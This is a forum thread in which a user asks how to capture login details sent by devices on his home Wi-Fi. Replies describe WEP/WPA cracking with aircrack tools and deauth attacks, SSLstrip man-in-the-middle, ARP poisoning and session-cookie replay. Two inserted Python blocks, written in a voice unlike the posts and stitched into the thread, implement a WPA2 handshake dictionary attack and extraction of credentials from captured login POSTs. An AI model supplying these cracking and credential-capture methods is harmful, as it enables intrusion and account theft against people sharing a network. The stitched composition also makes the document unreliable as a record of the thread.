Spying On My Own Wireless Network

deadman_uk

My Main Hardware:
D-Link DIR-615 Wireless Router (WPA2 encryption)
TalkTalk Broadband Modem (wireless turned off)
Windows 7 Desktop PC downstairs

Additional Wireless Devices:
Windows XP Netbook
Nokia n900 Smartphone
Samsung Genio Slide phone

The netbook and phones connect to the router wirelessly to receive an Internet connection. As a learning experience and a bit of fun, I wish to use my Windows 7 PC to spy on the activities of these wireless devices. E.g. I use the n900 to login to a website and I want the PC downstairs to capture my login details. Can this be done with WPA2 encryption? If not, if I drop the encryption down to WEP, how can I then achieve this? Since I am using my own network, on my own devices, this shouldn't be classed as illegal right?

Thanks
 
WinPcap is a packet capture driver that will sniff any network you have access to. Encryption doesn't matter if you already have access. There are tools to break WEP and WPA if you were outside the network trying to get in.
 
The first process that comes to mind involves two steps:

Packet capture
Then
Decrypting of the captured packets for analysis

Although it may just be easier to install keystroke loggers on the machines in question and/or have some comprehensive logging going on at the access point or router.
 
WinPcap is a packet capture driver that will sniff any network you have access to. Encryption doesn't matter if you already have access. There are tools to break WEP and WPA if you were outside the network trying to get in.

Ok, let's assume I leave WPA2 enabled and I install WinPcap. What steps do I have to take to enable the main PC to view login details that have been entered on a mobile or netbook device?

Thanks
 
The first process that comes to mind involves two steps:

Packet capture
Then
Decrypting of the captured packets for analysis

Although it may just be easier to install keystroke loggers on the machines in question and/or have some comprehensive logging going on at the access point or router.

Can you explain to me how this is achieved? What steps do I have to take? Installing a keylogger sort of defeats the purpose of this activity, plus because mobile phones are involved, this would likely be more difficult.

SPAN on the port connected to the WAP.

WAP is Wireless Access Point? You mean my router? What is SPAN?
 
If you are currently on the network, meaning you can see other computers and access the internet, then you can capture packets unencrypted and in plain text. This is why you use encryption in the first place, so the guy sitting in his car with a laptop can't do the same thing.
 
If you are currently on the network, meaning you can see other computers and access the internet, then you can capture packets unencrypted and in plain text. This is why you use encryption in the first place, so the guy sitting in his car with a laptop can't do the same thing.

But this would be on a switched network. And encryption would only be to the access point.
 
My bad, I read too fast and didn't catch that you set up a second, separate, network.

So what you want to know is how to break wireless encryption? If you use a strong password and WPA2, you won't be able to. WEP is trivial; download a Linux distro called BackTrack 4 (is 4 still the latest?). It comes preloaded with all the tools needed.
 
My bad, I read too fast and didn't catch that you set up a second, separate, network.

So what you want to know is how to break wireless encryption? If you use a strong password and WPA2, you won't be able to. WEP is trivial; download a Linux distro called BackTrack 4 (is 4 still the latest?). It comes preloaded with all the tools needed.

I do not have a 2nd separate network. I have a Talktalk modem connected to a D-Link DIR-615 wireless router. I am using WPA2 encryption and I have no intention (yet) to break into this encryption. As a member and admin of this network, I wish to go on a mobile device (and netbook), login to various websites and have my main PC capture the login details. Is this possible? If so, please can someone give me clear instructions if possible?

Once I can do this (something I consider basic), I may then ask or research more advanced things.

Thanks
 
I don't know if I am not understanding correctly, or you are being unclear....

So your computer (which you are trying to capture traffic from) and the netbook (which you are trying to capture the traffic of) are on the same network? The two devices can see each other?
 
I don't know if I am not understanding correctly, or you are being unclear....

So your computer (which you are trying to capture traffic from) and the netbook (which you are trying to capture the traffic of) are on the same network? The two devices can see each other?

Main PC is on desk, plugged into a TalkTalk modem and a D-Link wireless router. I then have 2 mobile devices and a netbook in other rooms of the house which use this same connection for internet activity. I have no network as such set up, but all devices connect to the same D-Link router wirelessly so I can have internet access throughout my home. I want the Main PC to capture logon details which the devices in the other rooms enter when they access various websites.

I am not sure if I can explain this any clearer.
 
Main PC is on desk, plugged into a TalkTalk modem and a D-Link wireless router. I then have 2 mobile devices and a netbook in other rooms of the house which use this same connection for internet activity. I have no network as such set up, but all devices connect to the same D-Link router wirelessly so I can have internet access throughout my home. I want the Main PC to capture logon details which the devices in the other rooms enter when they access various websites.

I am not sure if I can explain this any clearer.

Because you're on the same device which all traffic traverses (the router), with a few programs and some patience you will be able to view all network activity flowing in and out of your home.

Again, all you really need is the right software. The easiest way, ...I think?, is to install software on your main machine that will turn your main machine's NIC into promiscuous mode so as to listen to all traffic happening on your network (assuming it's a truly basic home network) 192.168.1.1 - 192.168.1.255. Another way would be to install software to capture packets of the wireless activity between the clients and the router/access point. This way would require two steps; the first would be to capture the packets (and enough of them to crack the method of encryption (WEP, WPA, WPA2)) and the second would be to then decrypt those packets to view the data.

I hate to say it but I'm a little out of practice in this avenue. I can't think of any programs off the top of my head to recommend for this venture but then again I also don't know if this is for legitimate purposes or for purposes of questionable legality either so... :rolleyes:
 
If you wanted to do this the way most attackers do, you need a wireless card that can be set into monitor mode, like the Alfa or other cards with the Atheros chipset.

You then use airodump or similar products and capture packets. For WEP you need a lot of IVs to crack it; you can use aireplay and other tools to increase the amount with deauth and other attacks. If you use airodump make sure you set the channel so it doesn't jump around.

If you're trying to crack WPA you just need a handshake and then you can brute force the WPA key.

You can get rainbow tables for common WPA passwords with common SSIDs; WPA passwords are salted off the SSID.

Since this is your network and you don't want to waste time brute forcing the key, you can use airdecap with the password you already know to decrypt the capture file. You need a wifi card that you can put into monitor mode to do this attack.


Promiscuous mode won't let you capture packets on a wireless network you're not connected to, and if you're connected then you know the password and this proves nothing.

There are a ton of resources online on how to do this along with videos.


The other issue you will probably run into is that once you sniff wireless, a lot of sites use SSL, so you won't be able to see login details. At this point you could associate with the AP once you have the key and run a MITM attack and use SSLstrip :)
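The handshake-and-passphrase mechanics described in the post above (PMK "salted off the SSID", a single captured 4-way handshake being enough to test candidate keys, and airdecap-ng decrypting a capture when the key is already known) as an added example that is not part of the thread and not aircrack-ng's own code. It implements the standard IEEE 802.11i derivation with the Python standard library only; every MAC address, nonce, SSID, passphrase and wordlist entry is constructed for the demonstration, and the EAPOL-Key message 2 is built here rather than captured.

```python
"""WPA2-PSK key derivation and 4-way-handshake MIC check with the Python
standard library only. Added example, not code from the thread and not
aircrack-ng's own code; it implements the IEEE 802.11i derivation that
airodump-ng/aircrack-ng/airdecap-ng rely on. Every MAC address, nonce,
passphrase and SSID below is constructed for the demonstration."""
import hashlib
import hmac
import struct

# Constructed fixture: the values an attacker sees on air (everything but
# the passphrase), plus the passphrase only the network owner knows.
SSID = "deadman-home"
PASSPHRASE = "correct horse battery"
AA = bytes.fromhex("001122334455")           # AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")          # client (supplicant) MAC
ANONCE = hashlib.sha256(b"anonce").digest()  # 32-byte nonces, constructed
SNONCE = hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "letmein", "12345678", "correct horse battery"]

MIC_OFF = 81  # offset of the 16-byte MIC inside an EAPOL-Key frame


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why precomputed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Returns 64 bytes: KCK (0:16, MIC key) | KEK (16:32) | TK (32:48, CCMP key)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with
    the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct handshake message 2 (client -> AP): EAPOL v2, type 3 (Key),
    descriptor type 2 (RSN), key info 0x010a (pairwise, MIC set, version 2),
    replay counter 1, SNonce, zero IV/RSC/ID, MIC, zero-length key data."""
    body = (struct.pack("!BHHQ", 2, 0x010A, 16, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8      # IV, RSC, ID
            + b"\x00" * 16 + struct.pack("!H", 0))          # MIC placeholder, key data length
    eapol = struct.pack("!BBH", 2, 3, len(body)) + body
    mic = eapol_mic(kck, eapol)
    return eapol[:MIC_OFF] + mic + eapol[MIC_OFF + 16:]


def check_passphrase(candidate, ssid, aa, spa, anonce, snonce, msg2) -> bool:
    """What aircrack-ng does per wordlist entry: derive PMK -> PTK -> KCK and
    see whether it reproduces the MIC carried in message 2."""
    kck = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFF:MIC_OFF + 16])


def dictionary_attack(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """Return the first candidate whose MIC matches, or None."""
    for word in wordlist:
        if check_passphrase(word, ssid, aa, spa, anonce, snonce, msg2):
            return word
    return None


def handshake_fixture():
    """Build the constructed capture: returns (msg2, tk), which the network
    owner can derive directly because they know PASSPHRASE."""
    ptk = derive_ptk(derive_pmk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    return build_msg2(SNONCE, ptk[:16]), ptk[32:48]


if __name__ == "__main__":
    msg2, tk = handshake_fixture()
    # Known key, the airdecap-ng case: the TK is what decrypts the CCMP data frames.
    print("TK for airdecap-style decryption:", tk.hex())
    # Unknown key, the aircrack-ng case: test each wordlist entry against the MIC.
    print("dictionary attack recovered:",
          dictionary_attack(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, msg2))
```

Two things the block makes concrete: the only secret input is the passphrase, since both MACs and both nonces are sent in the clear, so one captured handshake is enough to test candidates offline; and because the SSID is the PBKDF2 salt, a precomputed table is only useful against networks with the same SSID. Actual frame decryption (AES-CCM with the TK) needs a crypto library and is left out here.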
 
Because you're on the same device which all traffic traverses (the router), with a few programs and some patience you will be able to view all network activity flowing in and out of your home.

Again, all you really need is the right software. The easiest way, ...I think?, is to install software on your main machine that will turn your main machine's NIC into promiscuous mode so as to listen to all traffic happening on your network (assuming it's a truly basic home network) 192.168.1.1 - 192.168.1.255. Another way would be to install software to capture packets of the wireless activity between the clients and the router/access point. This way would require two steps; the first would be to capture the packets (and enough of them to crack the method of encryption (WEP, WPA, WPA2)) and the second would be to then decrypt those packets to view the data.

I hate to say it but I'm a little out of practice in this avenue. I can't think of any programs off the top of my head to recommend for this venture but then again I also don't know if this is for legitimate purposes or for purposes of questionable legality either so... :rolleyes:

This is a switched network, just installing software on the main machine would not capture the wireless-wireless packets.
 
Google BackTrack. If it cannot do it, it cannot be done. Go to the remote-exploit forums and check it out.

WPA is much more difficult to crack at any reasonable distance assuming your key is not a simple dictionary word. WEP can be cracked in just a few minutes with the right set of tools/routers in use.
 
Main PC is on desk, plugged into a talktalk modem and a D-link wireless router.

So your desktop is acting as the gateway?

Modem > desktop nic 1
Desktop nic 2 > router
router > wireless clients
 
So your desktop is acting as the gateway?

Modem > desktop nic 1
Desktop nic 2 > router
router > wireless clients

It goes like this:

- Cat5e cable connected from ethernet port on back of desktop PC to the wireless router

- Cat5e cable connected from Talktalk modem to back of same wireless router

- Wireless router broadcasts signal throughout the house and my various wireless devices capture this signal providing them with Internet accesss.

I will look into the suggestions given here, thanks very much all. If someone can write a clear, step by step guide on how to do this in the mean time, this would save me some research time.

btw, I am not interested in cracking my WPA2 encryption as I already know the SSID and key.
 
Google BackTrack. If it cannot do it, it cannot be done. Go to the remote-exploit forums and check it out.

WPA is much more difficult to crack at any reasonable distance assuming your key is not a simple dictionary word. WEP can be cracked in just a few minutes with the right set of tools/routers in use.

Is this what you mean? if so, it's an ISO and for Linux. Will this still work? It's 2GB download...

Why don't you just install WireShark? Then capture all data from your wireless interface.

I have installed this but am overwhelmed with what is going on when I capture. I really am new to this, hence why I wish to focus on my own network, knowing my SSID and key beforehand. Any tips? I will read the userguide if I can find it.
 
That is it. I've not played with version 4 much, but 3 was lightweight and could run off a flash drive. It does have a learning curve, but it is the most powerful toolkit for network pen-testing on all levels.
 
That is it. I've not played with version 4 much, but 3 was lightweight and could run off a flash drive. It does have a learning curve, but it is the most powerful toolkit for network pen-testing on all levels.

Can it run off my main PC hard drive? Do you have any experience with Wireshark? I am using it now and it looks interesting but I cannot achieve what my first aim is currently.
 
guys the problem here is he won't be capturing all the packets with a switch!

Exactly, The switch in his router only forwards packets to the port (WAN, 1, 2, 3, 4, or WLAN) they're destined for. WLAN is not going to see the traffic between port 1 and WAN; port 3 won't see the traffic between WLAN and port 2; and so on.

In short, he won't be able to do what he's wanting with the setup he currently has.
 
I have installed this but am overwhelmed with what is going on when I capture. I really am new to this, hence why I wish to focus on my own network, knowing my SSID and key beforehand. Any tips? I will read the userguide if I can find it.

At the top of the Wireshark window, there's a label "Filter:" and next to it a textbox. If you put
Code:
ip.proto == 6 || ip.proto == 17
it will give you all the UDP and TCP packets. You can also click Expression to see what else you can do for expressions. What the expression means is :
If (IP Protocol == UDP OR IP Protocol == TCP) then show those packets

If you're already on the network (since you said its your own) you won't have to decrypt, I believe.
 
Exactly, The switch in his router only forwards packets to the port (WAN, 1, 2, 3, 4, or WLAN) they're destined for. WLAN is not going to see the traffic between port 1 and WAN; port 3 won't see the traffic between WLAN and port 2; and so on.

In short, he won't be able to do what he's wanting with the setup he currently has.

Thank you. Finally somebody said it; I was just too lazy to explain. Also, it is pretty silly that people are suggesting he use BackTrack when he obviously does not know much about the basics.
 
Exactly, The switch in his router only forwards packets to the port (WAN, 1, 2, 3, 4, or WLAN) they're destined for. WLAN is not going to see the traffic between port 1 and WAN; port 3 won't see the traffic between WLAN and port 2; and so on.

In short, he won't be able to do what he's wanting with the setup he currently has.

The TalkTalk modem plugs into the INTERNET port of my wireless router. The PC connects to the LAN 2 port of my wireless router. No other cables are plugged in. I am probably wrong here but it looks like you think I am using multiple ports on my router.

At the top of the Wireshark window, there's a label "Filter:" and next to it a textbox. If you put
Code:
ip.proto == 6 || ip.proto == 17
it will give you all the UDP and TCP packets. You can also click Expression to see what else you can do for expressions. What the expression means is :
If (IP Protocol == UDP OR IP Protocol == TCP) then show those packets

If you're already on the network (since you said its your own) you won't have to decrypt, I believe.

I was previously using the HTTP filter but ip.proto == 6 || ip.proto == 17 is probably better now. I started capturing and connected to my wireless internet connection on my Nokia n900, I noticed in the capture details, it said Nokia. I then tried logging into various websites but I couldn't get much to show, certainly no logon details.

I even tried capturing from the PC Wireshark is installed on and I logged into Facebook and YouTube, yet I see no HTTP POST / in the protocol and info tabs, only GET /. It is my understanding that logon details would be stored when a description in the info tab says POST /. Am I correct? If so, I do not know why this isn't working; I do not see any POST / entries.
 
The TalkTalk modem plugs into the INTERNET port of my wireless router. The PC connects to the LAN 2 port of my wireless router. No other cables are plugged in. I am probably wrong here but it looks like you think I am using multiple ports on my router.

I was speaking in general. In your case WAN is the Internet port, WLAN is the internal port that the wireless radio is connected to.

You will not see any traffic that's not going directly to your desktop computer. The router has a built-in switch that looks at the destination IP of each packet it receives and forwards it only to the port that is associated with that IP. So if your wireless devices are sending information to the internet, the only devices that are going to see that information are the router itself and your modem. Your desktop PC will not see it.
 
I was speaking in general. In your case WAN is the Internet port, WLAN is the internal port that the wireless radio is connected to.

You will not see any traffic that's not going directly to your desktop computer. The router has a built-in switch that looks at the destination IP of each packet it receives and forwards it only to the port that is associated with that IP. So if your wireless devices are sending information to the internet, the only devices that are going to see that information are the router itself and your modem. Your desktop PC will not see it.

So there is no software available that will allow me to use my desktop PC to see information sent and received from wireless devices? Can I view this information from the router/modem itself?
 
So there is no software available that will allow me to use my desktop PC to see information sent and received from wireless devices? Can I view this information from the router/modem itself?

Not unless your desktop PC has a wireless adapter, and even then I'm not sure it would do you any good to capture the packets for other wireless devices since they'd all be encrypted.

You could set your desktop as a gateway if it had two network interfaces. That would put it in the middle of the router and the modem so that you could capture everything going between the two.
 
I was previously using the HTTP filter but ip.proto == 6 || ip.proto == 17 is probably better now. I started capturing and connected to my wireless internet connection on my Nokia n900, I noticed in the capture details, it said Nokia. I then tried logging into various websites but I couldn't get much to show, certainly no logon details.

I even tried capturing from the PC Wireshark is installed on and I logged into Facebook and YouTube, yet I see no HTTP POST / in the protocol and info tabs, only GET /. It is my understanding that logon details would be stored when a description in the info tab says POST /. Am I correct? If so, I do not know why this isn't working; I do not see any POST / entries.

For Facebook, you'll see that on the next line it says it's an SSL connection and shows encrypted data. Depending on how their TLS works you don't actually need to send your actual password, but your passkey created from the TLS encryption to validate your password (since they can decrypt server-side). There's a packet that pops up in Wireshark with "Application Data" in the Info field that will contain the encrypted data that is sent for validation. (On my Wireshark capture, there are 10 lines of 4 TCP packets, and 6 TLSv1 packets.) When you get to the packet that says "GET /home.php? HTTP/1.1", it means that the validation is completed, and if you examine that packet, under Hypertext Transfer Protocol>>"GET /home.php? HTTP/1.1\r\n" there's a field that contains the cookie that lets you stay logged into Facebook. I haven't tried it, but I'm pretty sure if you can replicate that cookie file with the unique identifiers that you've captured, you'll be able to refresh Facebook and be logged in.

If you look at the data when you log into the HardForums, you'll see a line similar to the one below
Code:
16    8.419276    192.168.103.11    75.126.99.220    HTTP    POST /login.php?do=login HTTP/1.1  (application/x-www-form-urlencoded)    1850
and in the middle box there'll be a section that shows the below
Code:
Line-based text data: application/x-www-form-urlencoded
[truncated] vb_login_username=ShadowStriker&vb_login_password=&s=&securitytoken=ABC123&do=login&vb_login_md5password=ABC123&vb_login_md5password_utf=ABC123
I took out the MD5 keys and passwords and replaced them with ABC123, obviously. :p
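The two capture-side points made earlier in the thread (the `ip.proto == 6 || ip.proto == 17` Wireshark filter, and the difference between a plaintext forum POST whose form fields are readable and an HTTPS login that only shows up as TLS "Application Data") as one added example, not code from the thread. It builds a few Ethernet/IPv4 frames in memory, dissects them the way the filter and "Follow TCP Stream" would, and pulls the login fields out of the plaintext POST; every frame, address, host name and credential is constructed for the demonstration, and the TLS record carries placeholder bytes rather than real ciphertext.

```python
"""Dissect constructed Ethernet frames the way Wireshark's
ip.proto == 6 || ip.proto == 17 filter and "Follow TCP Stream" do, extract
the fields of a plaintext HTTP POST login, and show what a TLS login leaves
behind instead. Added example, not code from the thread; every frame,
address and credential here is constructed for the demonstration."""
import socket
import struct
from urllib.parse import parse_qs

TCP, UDP, ICMP = 6, 17, 1
TLS_CONTENT = {0x14: "Change Cipher Spec", 0x15: "Alert",
               0x16: "Handshake", 0x17: "Application Data"}


def build_frame(src_ip, dst_ip, proto, sport, dport, payload):
    """Ethernet II / IPv4 / (TCP|UDP|raw) frame. Checksums are left at zero
    because nothing here validates them; MACs are constructed placeholders."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    if proto == TCP:   # data offset 5 words, flags PSH|ACK
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    elif proto == UDP:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    else:
        l4 = b""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4) + len(payload), 0, 0x4000,
                     64, proto, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + l4 + payload


def dissect(frame):
    """The fields the filter and packet-list columns work from, or None for
    non-IPv4 frames."""
    if frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    pkt = {"proto": ip[9], "src": socket.inet_ntoa(ip[12:16]), "dst": socket.inet_ntoa(ip[16:20])}
    l4 = ip[ihl:]
    if pkt["proto"] == TCP:
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", l4[:4])
        pkt["payload"] = l4[(l4[12] >> 4) * 4:]
    elif pkt["proto"] == UDP:
        pkt["sport"], pkt["dport"] = struct.unpack("!HH", l4[:4])
        pkt["payload"] = l4[8:]
    else:
        pkt["sport"] = pkt["dport"] = None
        pkt["payload"] = l4
    return pkt


def tcp_or_udp(frames):
    """The thread's display filter: ip.proto == 6 || ip.proto == 17."""
    return [p for p in map(dissect, frames) if p and p["proto"] in (TCP, UDP)]


def extract_login(payload: bytes):
    """Form fields of a plaintext application/x-www-form-urlencoded POST, else None."""
    if not payload.startswith(b"POST "):
        return None
    head, _, body = payload.partition(b"\r\n\r\n")
    if b"application/x-www-form-urlencoded" not in head:
        return None
    return {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}


def tls_record(payload: bytes):
    """(content type, version, length) of a TLS record header, else None.
    Over HTTPS this header is all a sniffer sees of the login."""
    if len(payload) < 5 or payload[0] not in TLS_CONTENT or payload[1] != 3:
        return None
    ctype, _, minor, length = struct.unpack("!BBBH", payload[:5])
    return TLS_CONTENT[ctype], ("SSL 3.0" if minor == 0 else f"TLS 1.{minor - 1}"), length


# Constructed capture: plaintext forum login, HTTPS login, a DNS query, a ping.
FORUM_BODY = (b"vb_login_username=testuser&vb_login_password=&securitytoken=ABC123"
              b"&do=login&vb_login_md5password=ABC123")
FORUM_POST = (b"POST /login.php?do=login HTTP/1.1\r\nHost: forum.example\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n"
              b"Content-Length: %d\r\n\r\n" % len(FORUM_BODY)) + FORUM_BODY
TLS_APPDATA = b"\x17\x03\x01" + struct.pack("!H", 48) + bytes(range(48))  # opaque stand-in
CAPTURE = [
    build_frame("192.168.0.101", "203.0.113.10", TCP, 49152, 80, FORUM_POST),
    build_frame("192.168.0.101", "203.0.113.20", TCP, 49153, 443, TLS_APPDATA),
    build_frame("192.168.0.101", "192.168.0.1", UDP, 49154, 53, b"\x12\x34\x01\x00" + b"\x00" * 8),
    build_frame("192.168.0.101", "192.168.0.1", ICMP, 0, 0, b"\x08\x00\x00\x00"),
]

if __name__ == "__main__":
    for p in tcp_or_udp(CAPTURE):
        print(p["src"], "->", p["dst"], "proto", p["proto"], "dport", p["dport"],
              extract_login(p["payload"]) or tls_record(p["payload"]))
```

The ping is dropped by the filter, the DNS query and both TCP flows pass it, the port-80 POST yields its form fields (including the blank vb_login_password and the md5 field the forum sends instead), and the port-443 flow yields only a record header, which is the point made about Facebook above.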
 
Not unless your desktop PC has a wireless adapter, and even then I'm not sure it would do you any good to capture the packets for other wireless devices since they'd all be encrypted.

You could set your desktop as a gateway if it had two network interfaces. That would put it in the middle of the router and the modem so that you could capture everything going between the two.

I heard you can use ARP poison using Cain that makes the computers on the LAN think YOUR pc is the router. Any information on this?

ShadowStriker, thanks for your informative post, I will try and digest what you just said shortly and see what I can do.
 
Personally, I like OmniPeek better than Wireshark, but they both are pretty useful. I find OmniPeek easier to read.
 
For Facebook, you'll see that on the next line it says it's an SSL connection and shows encrypted data. Depending on how their TLS works you don't actually need to send your actual password, but your passkey created from the TLS encryption to validate your password (since they can decrypt server-side). There's a packet that pops up in Wireshark with "Application Data" in the Info field that will contain the encrypted data that is sent for validation. (On my Wireshark capture, there are 10 lines of 4 TCP packets, and 6 TLSv1 packets.) When you get to the packet that says "GET /home.php? HTTP/1.1", it means that the validation is completed, and if you examine that packet, under Hypertext Transfer Protocol>>"GET /home.php? HTTP/1.1\r\n" there's a field that contains the cookie that lets you stay logged into Facebook. I haven't tried it, but I'm pretty sure if you can replicate that cookie file with the unique identifiers that you've captured, you'll be able to refresh Facebook and be logged in.

If you look at the data when you log into the HardForums, you'll see a line similar to the one below
Code:
16    8.419276    192.168.103.11    75.126.99.220    HTTP    POST /login.php?do=login HTTP/1.1  (application/x-www-form-urlencoded)    1850
and in the middle box there'll be a section that shows the below
Code:
Line-based text data: application/x-www-form-urlencoded
[truncated] vb_login_username=ShadowStriker&vb_login_password=&s=&securitytoken=ABC123&do=login&vb_login_md5password=ABC123&vb_login_md5password_utf=ABC123
I took out the MD5 keys and passwords and replaced them with ABC123, obviously. :p

Ok, since you mentioned Facebook in your example, let's focus on this for what I wish to do first. For the moment, I entered my Facebook login details, started to capture in Wireshark, hit the login button in Facebook and then immediately stopped capturing the moment I logged in. This is what it shows and it is similar to what you said:

http://img204.imageshack.us/img204/5861/wireshark1.jpg

So the GET /home.php? HTTP/1.1 packet contains the logon information? When I right click mine and select "Follow TCP Stream" I don't see what you showed me. Unless the Hardforum example doesn't apply for Facebook?
 
The HardForums and Facebook don't log in the same way. The only information you'll be able to pull will be under the Secure Socket Layer section, in the middle of that picture.

If you click the packet that says "GET /home.php? HTTP/1.1" in the middle of your screen you should be able to see in one of the sections that says "cookie blah blah blah"

The cookie won't show the password or username though, just the validation "certificate".
 
Sounds like trying to capture other people's details/logins/passwords when they log in to their accounts with their netbooks/smartphones whilst at your house using your network.

Why anyone using a netbook/smartphone on their own network would need to capture their own login details to a downstairs pc eludes me, sounds very suspicious IMO.
 
Sounds like trying to capture other people's details/logins/passwords when they log in to their accounts with their netbooks/smartphones whilst at your house using your network.

Why anyone using a netbook/smartphone on their own network would need to capture their own login details to a downstairs pc eludes me, sounds very suspicious IMO.
From what I'm gathering, he wants to test it out, so he'll know what to look for. And when you use a controlled variable, it's easier to know what to look for.
 